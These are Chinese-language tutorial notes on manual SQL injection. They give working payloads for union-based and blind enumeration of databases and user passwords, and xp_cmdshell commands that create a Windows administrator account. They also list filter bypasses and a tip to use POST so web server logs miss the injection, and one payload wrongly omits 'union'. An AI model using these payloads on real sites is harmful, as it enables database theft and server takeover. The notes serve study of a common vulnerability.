MYSQL数据库手工注入笔记

闭合方法

一般来说，程序员在书写select语句时，会对传入的变量进行一些处理，常见的有如下几种，这里以php为例，假设传输进来的变量为‘$id‘’,其他后端语言也相同。

select * from tables where id=$id;          #这种情况下，$id变量多为数字型    不需要闭合符号，可以直接注入，但如果系统做了只能传入数字型的判断，就无法注入
select * from tables where id='$id';        #这种情况下，$id变量多为字符型    需要闭合单引号，可以用?id=1'这种形式闭合
select * from tables where id="$id";        #这种情况下，$id变量多为字符型    需要闭合双引号，可以用?id=1"这种形式闭合
select * from tables where id=($id);        #这种情况下，$id变量多为数字型    需要闭合括号，可以用?id=1)这种形式闭合
select * from tables where id=('$id');      #这种情况下，$id变量多为字符型    需要同时闭合单引号和括号，可以用?id=1')这种形式闭合
select * from tables where id=("$id");      #这种情况下，$id变量多为字符型    需要同时闭合双引号和括号，可以用?id=1")这种形式闭合
select * from tables where id=(('$id'));    #这种情况下，$id变量多为字符型    需要同时闭合单引号和两层括号，可以用?id=1'))这种形式闭合
有些语句还有limit子句，如select * from tables where id='$id' limit 0,1;，我们可以通过上面提到的方法先闭合单引号
然后用%23，即注释符注释掉后面的语句，具体写法如下：?id=1'%23；即可闭合输出正确的语句

手工注入

找到注入点

在变量可控的部分加入一些符号，查看页面是否正常，举个例子：
有这么一个网站www.example.com/index.php?id=1
这里的id变量是用户可控的，可以在id=1后加一个单引号，变成id=1' 。页面如果报错多了一个单引号，那么说明可能存在注入点。
也可以在id=1后通过and符号多增加多个判断，如果‘id=1 and 1=1’页面正常，‘id=1 and 1=2’时页面不正常，则这个页面边可能存在注入。

闭合语句

如果在第一步的数据库报错中出现了limit附近的语法错误，一般来说，原有语句中的这个limit我们是无法利用的，多半可能会导致我们的闭合无法完成，而且为了后续便于我们遍历数据库，我们需要注入一个我们可控的limit子句，所以需要注释掉原有语句的limit子句，防止冲突。可以使用%23（#），--%20 %23这些数据库注释符号，进行注释。举个例子：
有这么一个网站：www.example.com/index.php?id=1
他在数据中的查询语句是select * from table where id='$id' limit 0,1;
那么我们注入的语句就可以是?id=1' %23
这个时候，带入到数据库查询的语句就变成了select * from table where id='$id' #' limit 0,1;

井 会把后面的语句注释掉，然后我们得到实际执行的语句就成了select * from table where id='$id';
使用的%23而不是#呢，因为由于编码的问题，在浏览器中直接提交#会变成空，所以我们使用url编码后的#，即%23，当传输到后端时，后端语言会对它自动解码成#，才能够成功带入数据库查询。

先通过order by 子句判断有几个字段。

payload:?id=1' order by n %23
如果n为3时页面正常，n为4时页面不正常，则可以判断有三个字段。这里就假设我们得到的n为3，继续举例。

image.png

通过and 1=2 union select 1,2,3……,n联合查询判断显示字段是哪些

payload:?id=1' and 1=2 union select 1,2,3……n

这里的n为我们上面通过order by n测试出来的那个值，这里我们取3。所以实际注入时就是?id=1' and 1=2 select 1,2,3

提交后，可以看到页面中出现可以被显示的字段编号，我们通过在响应位置替换成我们需要的查询字段和表就可以，如这里，我注入出来的是2和3位置可以被注入，也就是接下来所有注入的内容更都需要替换这里select语句中的2和3

image.png

暴出当前库和版本

payload:?id=1' and 1=2 union select 1,database(),version() %23

image.png

暴出其他数据库

payload:?id=1' and 1=2 union select 1,schema_name,3 from information_schema.schemata limit 0,1%23
通过调整limit即可遍历出所有的数据库，调整方法为limit 0,1;limit 1,2;limit 2,3……直到出现错误或异常

image.png

暴对应数据库的数据表

payload:?id=1' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=数据库名的十六进制 limit 0,1%23

这里我用当前数据库来做演示，即security库
遍历也是通过调整limit来实现的，方法同上

image.png

暴对应数据库、数据表的各个字段

payload:?id=1' and 1=2 union select 1,column_name,3 from information_schema.columns where table_schema=库名十六进制 and table_name=表名十六进制 limit 0,1%23
这里我用security库和security中的users表来做演示
遍历也是通过调整limit来实现的，方法同（4）

image.png

暴数据，也就是我们常说的脱库

payload:?id=1' and 1=2 union select 1,字段名,3 from 库名.表名 limit 0,1%23
这里由于2和3位都是可用的，所以我可以在两个位同时显示两个字段。这里选用了security库的users表，我们只关注用户名和密码字段，所以只暴这两个字段即可
遍历也是通过调整limit来实现的，方法同（4）

image.png

进 阶 篇

根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：

(A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：

• Select * from 表名 where 字段=49
• 注入的参数为ID=49 And [查询条件]，即是生成语句：
• Select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：

Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
? 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：

• Select * from 表名 where 字段like ’%关键字%’
  注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句：
• Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

接着，将查询条件替换成SQL语句，猜解表名，例如：

猜表

ID=49 And (Select Count(*) from COLLATIONS)>=0

如果页面就与ID=49的相同，说明附加条件成立，即表COLLATIONS存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。

select * from COLLATIONS  where id > 230 and (select count(*) from COLLATIONS)>=197

猜字段

表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。

猜数据内容

我们举个例子，已知表Admin中存在username字段，首先，我们取第一条记录，测试长度：

[http://www.mytest.com/showdetail.asp?id=49](http://www.mytest.com/showdetail.asp?id=49) ;and (select top 1 len(username) from Admin)>0 

先说明原理：如果top 1的username长度大于0，则条件成立；接着就是>1、>2、>3这样测试下去，一直到条件不成立为止，比如>7成立，>8不成立，就是len(username)=8
当然没人会笨得从0,1,2,3一个个测试，怎么样才比较快就看各自发挥了。在得到username的长度后，用mid(username,N,1)截取第N位字符，再asc(mid(username,N,1))得到ASCII码，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步缩小范围的方法得到第1位字符的ASCII码，注意的是英文和数字的ASCII码在1-128之间，可以用折半法加速猜解，如果写成程序测试，效率会有极大的提高。

image.png

SQL注入常用函数

有SQL语言基础的人，在ＳＱＬ注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平，特别是一些常用的函数及命令。
Access：asc(字符) SQLServer：unicode(字符)
作用：返回某字符的ASCII码

Access：chr(数字) SQLServer：nchar(数字)
作用：与asc相反，根据ASCII码返回字符

Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L)
作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串

Access：abc(数字) SQLServer：abc (数字)
作用：返回数字的绝对值（在猜解汉字的时候会用到）

Access：A between B And C SQLServer：A between B And C
作用：判断A是否界于B与C之间
截取函数 MID
ASCII码函数 ASCII

高级篇

利用系统表注入SQLServer数据库

SQLServer是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了很大的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子：

① [http://site/url.asp?id=1;exec](http://site/url.asp?id=1;exec) master..xp_cmdshell “net user name password /add”--

这句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储过程xp_cmdshell，这个存储过程用于调用系统命令，于是，用net命令新建了用户名为name、密码为password的windows的帐号

② [http://site/url.asp?id=1;exec](http://site/url.asp?id=1;exec) master..xp_cmdshell “net localgroup name administrators /add”--

将新建的帐号name加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的。

 ③ [http://site/url.asp?id=1](http://site/url.asp?id=1) ;and db_name()>0

绕过程序限制继续注入

简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where xtype=char(85)代替；如果字符是中文的，比如where name=’用户’，可以用where name=nchar(29992)+nchar(25143)代替。

经验小结

• 1.有些人会过滤Select、Update、Delete这些关键字，但偏偏忘记区分大小写，所以大家可以用selecT这样尝试一下。
• 2.在猜不到字段名时，不妨看看网站上的登录表单，一般为了方便起见，字段名都与表单的输入框取相同的名字。
• 3.特别注意：地址栏的+号传入程序后解释为空格，%2B解释为+号，%25解释为%号，具体可以参考URLEncode的相关介绍。
• 4.用Get方法注入时，IIS会记录你所有的提交字符串，对Post方法做则不记录，所以能用Post的网址尽量不用Get。
• 5. 猜解Access时只能用Ascii逐字解码法，SQLServer也可以用这种方法，只需要两者之间的区别即可，但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提高。